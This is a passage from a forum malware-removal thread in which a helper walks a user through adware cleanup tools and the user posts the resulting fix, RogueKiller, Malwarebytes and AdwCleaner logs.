"HKLM\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000004" => key removed successfully
"HKLM\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000016" => key removed successfully

========= RemoveProxy: =========

"HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer" => key removed successfully
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => value removed successfully
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => value removed successfully
HKU\S-1-5-21-1030869394-3123877279-975090705-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => value removed successfully
HKU\S-1-5-21-1030869394-3123877279-975090705-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => value removed successfully


========= End of RemoveProxy: =========

HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer => key not found.
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value restored successfully
"HKU\S-1-5-21-1030869394-3123877279-975090705-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{6EB44F16-E471-4C00-BC7C-49D2839C991D}" => key removed successfully
HKCR\CLSID\{6EB44F16-E471-4C00-BC7C-49D2839C991D} => key not found.
Firefox "homepage" removed successfully
Firefox SelectedSearchEngineuser_pref("browser.search.selectedEngine","Search The Web (Only-Search)"); removed successfully
Firefox DefaultSearchEngineuser_pref("browser.search.defaultenginename","Search The Web (Only-Search)"); removed successfully
Firefox "Keyword.URL" removed successfully
Firefox "newtab" removed successfully
C:\Users\hersheychoco9\AppData\Roaming\Mozilla\Firefox\Profiles\6jvaf1qu.default\searchplugins\onlysearchkms1.xml => moved successfully
"C:\Users\hersheychoco9\AppData\Roaming\Mozilla\Firefox\Profiles\6jvaf1qu.default\searchplugins\onlysearchkms1.xml" => not found.
HKLM\Software\Mozilla\Firefox\Extensions\\{1E5EEC8E-2CFF-4C0B-84C7-19D10F0CAF75} => value removed successfully
HKLM\Software\Wow6432Node\Mozilla\Firefox\Extensions\\jid1-xNAj4KGyf5wyhg@jetpack => value removed successfully
HKLM\Software\Wow6432Node\Mozilla\Firefox\Extensions\\{1E5EEC8E-2CFF-4C0B-84C7-19D10F0CAF75} => value removed successfully
"HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\gihfmmedoddijgnhkgfgnkeohkpbipol" => key removed successfully
NetprotAdp => service removed successfully
SushiLeadsUpdaterService => service removed successfully
Update Simple for You => service removed successfully
WajaNetEn Monitor => service removed successfully
WsDrvInst => service removed successfully
BAPIDRV => service removed successfully
cherimoya => service removed successfully
EagleX64 => service removed successfully
iscFlash => service removed successfully
PCDSRVC{3B54B31B-D06B6431-06020200}_0 => service removed successfully
X6va029 => service removed successfully
{b9ae98e0-3c49-4d93-b43a-0f0a909e378d}Gw64 => service removed successfully
"C:\Users\hersheychoco9\AppData\Local\BrowserAir" => not found.
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\DailyPCClean => moved successfully
C:\Program Files (x86)\DailyPCClean => moved successfully
C:\Users\hersheychoco9\Documents\DailyPCClean => moved successfully
C:\Users\hersheychoco9\AppData\Roaming\DailyPCClean => moved successfully
C:\Program Files (x86)\Roboscan_IS_Free.exe => moved successfully
C:\Users\hersheychoco9\AppData\Roaming\Adobe PNG Format CS5 Prefs => moved successfully
C:\Users\hersheychoco9\AppData\Roaming\Bubble Dock.boostrap.log => moved successfully
C:\Users\hersheychoco9\AppData\Roaming\Bubble Dock.installation.log => moved successfully
C:\Users\hersheychoco9\AppData\Roaming\Selection Tools.installation.log => moved successfully
C:\Users\hersheychoco9\AppData\Roaming\WindApp.boostrap.log => moved successfully
C:\Users\hersheychoco9\AppData\Roaming\WindApp.installation.log => moved successfully
"C:\Users\hersheychoco9\AppData\Local\ezvtum.dll" => not found.
C:\Users\hersheychoco9\AppData\Local\recently-used.xbel => moved successfully
C:\Users\hersheychoco9\AppData\Local\uninstall.exe => moved successfully
C:\ProgramData\DP45977C.lfl => moved successfully
C:\ProgramData\tempimage.bmp => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{12359E8D-4BF8-4EEF-8EF1-AF0A806E5D27}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{12359E8D-4BF8-4EEF-8EF1-AF0A806E5D27}" => key removed successfully
C:\Windows\System32\Tasks\Pool Component => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Pool Component" => key removed successfully
C:\Users\hersheychoco9\AppData\Local\Pool Component\{118F9E4E-9E23-FEE4-DA4B-E734A04928EF}\PoolComponent.dll => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{63B79E46-FBBD-4C8A-B7AA-45C6731402FF}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{63B79E46-FBBD-4C8A-B7AA-45C6731402FF}" => key removed successfully
C:\Windows\System32\Tasks\IBUpd2 => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\IBUpd2" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{75F57505-E997-49EF-8280-CBEDA94B26CE}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{75F57505-E997-49EF-8280-CBEDA94B26CE}" => key removed successfully
C:\Windows\System32\Tasks\Seventh => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Seventh" => key removed successfully
C:\Users\hersheychoco9\AppData\Roaming\Seventh => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{82DB69B4-7124-4705-AFC2-219F5EBB3241}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{82DB69B4-7124-4705-AFC2-219F5EBB3241}" => key removed successfully
C:\Windows\System32\Tasks\{0F0F7D47-7E08-7D0B-7811-7D0C050B110D} => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{0F0F7D47-7E08-7D0B-7811-7D0C050B110D}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{86B9E75F-1889-49B5-B36A-35C70EC3D395}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{86B9E75F-1889-49B5-B36A-35C70EC3D395}" => key removed successfully
C:\Windows\System32\Tasks\Pool Component2 => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Pool Component2" => key removed successfully
C:\Users\hersheychoco9\AppData\Local\Pool Component\{118F9E4E-9E23-FEE4-DA4B-E734A04928EF}\untjptlj.dll => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{9CCB0C95-9CC9-4F2E-8D83-663775D82970}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{9CCB0C95-9CC9-4F2E-8D83-663775D82970}" => key removed successfully
C:\Windows\System32\Tasks\LaunchPreSignup => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\LaunchPreSignup" => key removed successfully
"C:\Program Files (x86)\OLBPre" => not found.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{B1D873D1-5121-42A0-9C92-76FBCD27335F}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B1D873D1-5121-42A0-9C92-76FBCD27335F}" => key removed successfully
C:\Windows\System32\Tasks\Sixth => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Sixth" => key removed successfully
C:\Users\hersheychoco9\AppData\Roaming\Sixth => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{CBDF6C7E-6032-4090-8BEC-C5ACB6DAA611}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{CBDF6C7E-6032-4090-8BEC-C5ACB6DAA611}" => key removed successfully
C:\Windows\System32\Tasks\Ijufcyl => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Ijufcyl" => key removed successfully
"C:\PROGRA~1\SHOPPE~1" => not found.
"C:\PROGRA~1\SHOPPE~1\Osifch.bat" => not found.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{D07CC060-B787-4C15-B547-123801C27E3B}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{D07CC060-B787-4C15-B547-123801C27E3B}" => key removed successfully
C:\Windows\System32\Tasks\Only-search Updater => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Only-search Updater" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{80FA20B2-A979-4EAB-9EBA-6D46F57955A1}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{80FA20B2-A979-4EAB-9EBA-6D46F57955A1}" => key removed successfully
C:\Windows\System32\Tasks\Genius => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Genius" => key removed successfully
C:\Users\hersheychoco9\AppData\Roaming\Genius => moved successfully

==== End of Fixlog 20:30:16 ====

 

[hersheychoco]

I was able to uninstall Pool Component but couldn't find the Setup one

 

[Broni]

After restart see if you can connect.

 

[hersheychoco]

THANK YOU SO MUCH! YOU'RE A LIFE SAVER!!!!!!(y)

 

[Broni]

We're not done but I'm glad to hear good news

Download RogueKiller from one of the following links and save it to your Desktop:

Link 1
Link 2

• Close all the running programs
• Windows Vista/7/8 users: right click on RogueKiller.exe, click Run as Administrator
• Otherwise just double-click on RogueKiller.exe
• Pre-scan will start. Let it finish.
• Click on SCAN button.
• Wait until the Status box shows Scan Finished
• Click on Delete.
• Wait until the Status box shows Deleting Finished.
• Click on Report and copy/paste the content of the Notepad into your next reply.
• RKreport.txt could also be found on your desktop.
• If more than one log is produced post all logs.
• If RogueKiller has been blocked, do not hesitate to try a few times more. If really won't run, rename it to winlogon.exe (or winlogon.com) and try again

Please download Malwarebytes Anti-Malware (MBAM) to your desktop.
NOTE. If you already have MBAM 2.0 installed scroll down.

• Double-click mbam-setup-2.0.0.1000.exe and follow the prompts to install the program.
  
• At the end, be sure a checkmark is placed next to the following:
  
• Launch Malwarebytes Anti-Malware
• A 14 day trial of the Premium features is pre-selected. You may deselect this if you wish, and it will not diminish the scanning and removal capabilities of the program.
  
• Click Finish.
• On the Dashboard, click the 'Update Now >>' link
• After the update completes, click the 'Scan Now >>' button.
  
• Or, on the Dashboard, click the Scan Now >> button.
• If an update is available, click the Update Now button.
  
• A Threat Scan will begin.
• When the scan is complete, if there have been detections, click Apply Actions to allow MBAM to clean what was detected.
• In most cases, a restart will be required.
• Wait for the prompt to restart the computer to appear, then click on Yes.

If you already have MBAM 2.0 installed:

• On the Dashboard, click the 'Update Now >>' link
• After the update completes, click the 'Scan Now >>' button.
  
• Or, on the Dashboard, click the Scan Now >> button.
• If an update is available, click the Update Now button.
  
• A Threat Scan will begin.
• When the scan is complete, if there have been detections, click Apply Actions to allow MBAM to clean what was detected.
• In most cases, a restart will be required.
• Wait for the prompt to restart the computer to appear, then click on Yes.

How to get logs:
(Export log to save as txt)

• After the restart once you are back at your desktop, open MBAM once more.
• Click on the History tab > Application Logs.
• Double click on the Scan Log which shows the Date and time of the scan just performed.
• Click 'Export'.
• Click 'Text file (*.txt)'
• In the Save File dialog box which appears, click on Desktop.
• In the File name: box type a name for your scan log.
• A message box named 'File Saved' should appear stating "Your file has been successfully exported".
• Click Ok
• Attach that saved log to your next reply.

(Copy to clipboard for pasting into forum replies or tickets)

• After the restart once you are back at your desktop, open MBAM once more.
• Click on the History tab > Application Logs.
• Double click on the Scan Log which shows the Date and time of the scan just performed.
• Click 'Copy to Clipboard'
• Paste the contents of the clipboard into your reply.

Please download AdwCleaner by Xplode onto your desktop.

• Close all open programs and internet browsers.
• Double click on adwcleaner.exe to run the tool.
• Click on Scan button.
• When the scan has finished click on Clean button.
• Your computer will be rebooted automatically. A text file will open after the restart.
• Please post the contents of that logfile with your next reply.
• You can find the logfile at C:\AdwCleaner[S1].txt as well.

Please download Junkware Removal Tool to your desktop.

• Shut down your protection software now to avoid potential conflicts.
• Run the tool by double-clicking it. If you are using Windows Vista, 7, or 8; instead of double-clicking, right-mouse click JRT.exe and select "Run as Administrator".
• The tool will open and start scanning your system.
• Please be patient as this can take a while to complete depending on your system's specifications.
• On completion, a log (JRT.txt) is saved to your desktop and will automatically open.
• Post the contents of JRT.txt into your next message.

 

[hersheychoco]

RogueKiller V11.0.6.0 [Jan 4 2016] (Free) by Adlice Software
mail : http://www.adlice.com/contact/
Feedback : http://forum.adlice.com
Website : http://www.adlice.com/software/roguekiller/
Blog : http://www.adlice.com

Operating System : Windows 8.1 (6.3.9600) 64 bits version
Started in : Normal mode
User : hersheychoco9 [Administrator]
Started from : C:\Users\hersheychoco9\Downloads\RogueKiller.exe
Mode : Delete -- Date : 01/05/2016 21:12:49

¤¤¤ Processes : 0 ¤¤¤

¤¤¤ Registry : 18 ¤¤¤
[PUP] (X86) HKEY_LOCAL_MACHINE\Software\DAILYPCCLEAN -> Not selected
[PUP] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{10921475-03CE-4E04-90CE-E2E7EF20C814} (C:\Program Files (x86)\IObit\IObit Uninstaller\UninstallExplorer64.dll) -> Not selected
[PUP] (X64) HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run | WeatherBug : C:\Program Files\Earth Networks\WeatherBug\WeatherBug.exe [x] -> Not selected
[PUP] (X86) HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run | WeatherBug : C:\Program Files\Earth Networks\WeatherBug\WeatherBug.exe [x] -> Not selected
[PUP] (X64) HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Run | WeatherBug : C:\Program Files\Earth Networks\WeatherBug\WeatherBug.exe [x] -> Not selected
[PUP] (X86) HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Run | WeatherBug : C:\Program Files\Earth Networks\WeatherBug\WeatherBug.exe [x] -> Not selected
[PUM.SearchPage] (X64) HKEY_USERS\S-1-5-21-1030869394-3123877279-975090705-1001\Software\Microsoft\Internet Explorer\Main | Search Bar : Preserve -> Not selected
[PUM.SearchPage] (X86) HKEY_USERS\S-1-5-21-1030869394-3123877279-975090705-1001\Software\Microsoft\Internet Explorer\Main | Search Bar : Preserve -> Not selected
[PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{8718928D-CBEB-45EA-A621-800A9249001D} | NameServer : 208.87.151.17,208.87.151.16 ([-][]) -> Not selected
[PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{8D32E4AD-6D5F-4475-9B56-EA1EDF88081D} | NameServer : 208.87.151.17,208.87.151.16 ([-][]) -> Not selected
[PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{9D26E07C-D4C8-4B1E-B9E8-A0AF8D2D2A78} | NameServer : 208.87.151.17,208.87.151.16 ([-][]) -> Not selected
[PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{EF083E6B-E699-4F22-B8D6-6AFFF4638C72} | NameServer : 208.87.151.17,208.87.151.16 ([-][]) -> Not selected
[PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{FE2B955A-7119-470B-99F7-D23E3FE58734} | NameServer : 208.87.151.17,208.87.151.16 ([-][]) -> Not selected
[PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\Tcpip\Parameters\Interfaces\{8718928D-CBEB-45EA-A621-800A9249001D} | NameServer : 208.87.151.17,208.87.151.16 ([-][]) -> Not selected
[PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\Tcpip\Parameters\Interfaces\{8D32E4AD-6D5F-4475-9B56-EA1EDF88081D} | NameServer : 208.87.151.17,208.87.151.16 ([-][]) -> Not selected
[PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\Tcpip\Parameters\Interfaces\{9D26E07C-D4C8-4B1E-B9E8-A0AF8D2D2A78} | NameServer : 208.87.151.17,208.87.151.16 ([-][]) -> Not selected
[PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\Tcpip\Parameters\Interfaces\{EF083E6B-E699-4F22-B8D6-6AFFF4638C72} | NameServer : 208.87.151.17,208.87.151.16 ([-][]) -> Not selected
[PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\Tcpip\Parameters\Interfaces\{FE2B955A-7119-470B-99F7-D23E3FE58734} | NameServer : 208.87.151.17,208.87.151.16 ([-][]) -> Not selected

¤¤¤ Tasks : 2 ¤¤¤
[PUP] \Easy Driver Pro Schedule -- "C:\Program Files (x86)\Probit Software\Easy Driver Pro\EDPTray.exe" -> Not selected
[PUP] \SushiLeads -- C:\Program Files (x86)\sushileads\ScheduledTask.exe -> Not selected

¤¤¤ Files : 12 ¤¤¤
[PUP][Folder] C:\Users\hersheychoco9\AppData\Roaming\WTools -> Deleted
[Hj.Name][File] C:\ProgramData\Roboscan\Roboscan\sysbackup\explorer.exe -> ERROR [5]
[Hj.Name][File] C:\ProgramData\Roboscan\Roboscan\sysbackup\userinit.exe -> ERROR [5]
[Hj.Name][File] C:\ProgramData\Roboscan\Roboscan\sysbackup\winlogon.exe -> ERROR [5]
[PUP][Folder] C:\ProgramData\{BAF091CA-86C4-4627-ADA1-897E2621C1B0} -> Deleted
[PUP][Folder] C:\Program Files (x86)\4C4C4544-1451365214-3310-8034-C4C04F343032 -> Deleted
[PUP][File] C:\Program Files (x86)\4C4C4544-1451365214-3310-8034-C4C04F343032\Uninstall.exe -> Deleted
[PUP][File] C:\Program Files (x86)\4C4C4544-1451365214-3310-8034-C4C04F343032\vnsg3AF.tmp -> Deleted
[PUP][Folder] C:\Program Files (x86)\4C4C4544-1451365457-3310-8034-C4C04F343032 -> Deleted
[PUP][File] C:\Program Files (x86)\4C4C4544-1451365457-3310-8034-C4C04F343032\Uninstall.exe -> Deleted
[PUP][File] C:\Program Files (x86)\4C4C4544-1451365457-3310-8034-C4C04F343032\vnsvBA11.tmp -> Deleted
[PUP][Folder] C:\Program Files (x86)\4C4C4544-1451366851-3310-8034-C4C04F343032 -> Deleted
[PUP][File] C:\Program Files (x86)\4C4C4544-1451366851-3310-8034-C4C04F343032\Uninstall.exe -> Deleted
[PUP][File] C:\Program Files (x86)\4C4C4544-1451366851-3310-8034-C4C04F343032\vnskFE9C.tmp -> Deleted
[PUP][Folder] C:\Program Files (x86)\onlysearch -> Deleted
[PUP][Folder] C:\Program Files (x86)\onlysearch\onlysearch\1.4.2.4 -> Deleted
[PUP][File] C:\Program Files (x86)\onlysearch\onlysearch\updt.js -> Deleted
[PUP][Folder] C:\Program Files (x86)\onlysearch\onlysearch -> Deleted
[PUP][Folder] C:\Program Files (x86)\Probit Software -> Deleted
[PUP][Folder] C:\Program Files (x86)\Super Optimizer -> Deleted
[PUP][File] C:\Program Files (x86)\Super Optimizer\SupOptStart.exe -> Deleted
[PUP][Folder] C:\Program Files (x86)\sushileads -> Deleted
[PUP][File] C:\Program Files (x86)\sushileads\AppResources.dll -> Deleted
[PUP][File] C:\Program Files (x86)\sushileads\Common.Logging.dll -> Deleted
[PUP][File] C:\Program Files (x86)\sushileads\HtmlAgilityPack.dll -> Deleted
[PUP][File] C:\Program Files (x86)\sushileads\Microsoft.Win32.TaskScheduler.dll -> Deleted
[PUP][File] C:\Program Files (x86)\sushileads\Newtonsoft.Json.dll -> Deleted
[PUP][File] C:\Program Files (x86)\sushileads\NpUpdaterService.exe -> Deleted
[PUP][File] C:\Program Files (x86)\sushileads\Quartz.dll -> Deleted
[PUP][File] C:\Program Files (x86)\sushileads\RestSharp.dll -> Deleted
[PUP][File] C:\Program Files (x86)\sushileads\SushiLeadsApplication.exe -> Deleted

¤¤¤ Hosts File : 0 ¤¤¤

¤¤¤ Antirootkit : 0 (Driver: Not loaded [0xc000036b]) ¤¤¤

¤¤¤ Web browsers : 0 ¤¤¤

¤¤¤ MBR Check : ¤¤¤
+++++ PhysicalDrive0: ST1000LM024 HN-M101MBB +++++
--- User ---
[MBR] ac549645ac34136e1ed8d1039e17d487
[BSP] b481a814b9dfd05236432bf6c92742d1 : Empty|VT.Unknown MBR Code
Partition table:
0 - [MAN-MOUNT] EFI system partition | Offset (sectors): 2048 | Size: 500 MB
1 - [SYSTEM][MAN-MOUNT] Basic data partition | Offset (sectors): 1026048 | Size: 40 MB
2 - [MAN-MOUNT] Microsoft reserved partition | Offset (sectors): 1107968 | Size: 128 MB
3 - [SYSTEM][MAN-MOUNT] Basic data partition | Offset (sectors): 1370112 | Size: 750 MB
4 - Basic data partition | Offset (sectors): 2906112 | Size: 942158 MB
5 - [SYSTEM][MAN-MOUNT] Microsoft recovery partition | Offset (sectors): 1932445696 | Size: 10291 MB
User = LL1 ... OK
User = LL2 ... OK

 

[hersheychoco]

I can't find the RKreport.txt file

 

[Broni]

You just posted it.

 

[hersheychoco]

Oh lol okay I thought there were two different txt files due to the name XD

 

[hersheychoco]

Here's the scanned log
it says paste or attached so I don't know..

File:
Malwarebytes Anti-Malware
www.malwarebytes.org

Scan Date: 1/5/2016
Scan Time: 9:26 PM
Logfile: Scannedlog2016.txt
Administrator: Yes

Version: 2.2.0.1024
Malware Database: v2016.01.06.01
Rootkit Database: v2016.01.05.01
License: Free
Malware Protection: Disabled
Malicious Website Protection: Disabled
Self-protection: Disabled

OS: Windows 8.1
CPU: x64
File System: NTFS
User: hersheychoco9

Scan Type: Threat Scan
Result: Completed
Objects Scanned: 387326
Time Elapsed: 13 min, 17 sec

Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Disabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled

Processes: 0
(No malicious items detected)

Modules: 0
(No malicious items detected)

Registry Keys: 0
(No malicious items detected)

Registry Values: 0
(No malicious items detected)

Registry Data: 0
(No malicious items detected)

Folders: 0
(No malicious items detected)

Files: 0
(No malicious items detected)

Physical Sectors: 0
(No malicious items detected)


(end)

 

[Broni]

Always paste.

 

[hersheychoco]

Okay, running the last two tools now.

 

[hersheychoco]

# AdwCleaner v5.028 - Logfile created 05/01/2016 at 21:59:40
# Updated 04/01/2016 by Xplode
# Database : 2016-01-04.2 [Server]
# Operating system : Windows 8.1 (x64)
# Username : hersheychoco9 - CHOCOYAUTJA
# Running from : C:\Users\hersheychoco9\Desktop\adwcleaner_5.028.exe
# Option : Cleaning
# Support : http://toolslib.net/forum

***** [ Services ] *****


***** [ Folders ] *****

[-] Folder Deleted : C:\Program Files\WajaNetEn
[-] Folder Deleted : C:\Users\hersheychoco9\AppData\Local\YSearchUtil
[-] Folder Deleted : C:\Users\hersheychoco9\AppData\Roaming\Common\LuaRT
[-] Folder Deleted : C:\Users\hersheychoco9\AppData\Roaming\Store
[-] Folder Deleted : C:\Users\hersheychoco9\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\ASPackage
[-] Folder Deleted : C:\Users\hersheychoco9\Documents\Probit Software
[-] Folder Deleted : C:\Windows\Update Pro
[-] Folder Deleted : C:\Windows\SysWOW64\config\systemprofile\AppData\Local\StormWarnings
[-] Folder Deleted : C:\Windows\SysWOW64\config\systemprofile\AppData\Local\YSearchUtil
[-] Folder Deleted : C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\StormWarnings
[-] Folder Deleted : C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\DhcpUpdater

***** [ Files ] *****


***** [ DLLs ] *****


***** [ Shortcuts ] *****


***** [ Scheduled tasks ] *****

[-] Task Deleted : Genius_Interval

***** [ Registry ] *****

[-] Value Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION [WindoWeather.exe]
[-] Key Deleted : HKLM\SOFTWARE\bba161f9-9f31-0676-ab03-19d4f658b1c8
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{1AA60054-57D9-4F99-9A55-D0FBFBE7ECD3}
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{6E993643-8FBC-44FE-BC85-D318495C4D96}
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{A43DE495-3D00-47D4-9D2C-303115707939}
[-] Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{14EF423E-3EE8-44AE-9337-07AC3F27B744}
[-] Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{10921475-03CE-4E04-90CE-E2E7EF20C814}
[-] Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{10921475-03CE-4E04-90CE-E2E7EF20C814}
[-] Value Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID [{79F768ED-0B12-42EF-8257-36751A0ECF3A}]
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\CLSID\{10921475-03CE-4E04-90CE-E2E7EF20C814}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{A9582D7B-F24A-441D-9D26-450D58F3CD17}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{EE0D8859-2ED4-4B0D-9812-16865B9AFD65}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{10921475-03CE-4E04-90CE-E2E7EF20C814}
[-] Key Deleted : HKCU\Software\APN PIP
[-] Key Deleted : HKCU\Software\Store
[-] Key Deleted : HKCU\Software\WTools
[-] Key Deleted : HKCU\Software\Probit Software
[-] Key Deleted : HKCU\Software\Yahoo\Companion
[-] Key Deleted : HKCU\Software\Microsoft\Tinstalls
[-] Key Deleted : HKLM\SOFTWARE\{3A7D3E19-1B79-4E4E-BD96-5467DA2C4EF0}
[-] Key Deleted : HKLM\SOFTWARE\NpApp
[-] Key Deleted : HKLM\SOFTWARE\SmartDNS
[-] Data Restored : HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{8718928D-CBEB-45EA-A621-800A9249001D} [NameServer]
[-] Data Restored : HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{8D32E4AD-6D5F-4475-9B56-EA1EDF88081D} [NameServer]
[-] Data Restored : HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{9D26E07C-D4C8-4B1E-B9E8-A0AF8D2D2A78} [NameServer]
[-] Data Restored : HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{EF083E6B-E699-4F22-B8D6-6AFFF4638C72} [NameServer]
[-] Data Restored : HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{FE2B955A-7119-470B-99F7-D23E3FE58734} [NameServer]
[-] Data Restored : HKLM\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{8718928D-CBEB-45EA-A621-800A9249001D} [NameServer]
[-] Data Restored : HKLM\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{8D32E4AD-6D5F-4475-9B56-EA1EDF88081D} [NameServer]
[-] Data Restored : HKLM\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{9D26E07C-D4C8-4B1E-B9E8-A0AF8D2D2A78} [NameServer]
[-] Data Restored : HKLM\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{EF083E6B-E699-4F22-B8D6-6AFFF4638C72} [NameServer]
[-] Data Restored : HKLM\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{FE2B955A-7119-470B-99F7-D23E3FE58734} [NameServer]

***** [ Web browsers ] *****


*************************

:: "Tracing" keys removed
:: Winsock settings cleared

########## EOF - C:\AdwCleaner\AdwCleaner[C1].txt - [4679 bytes] ##########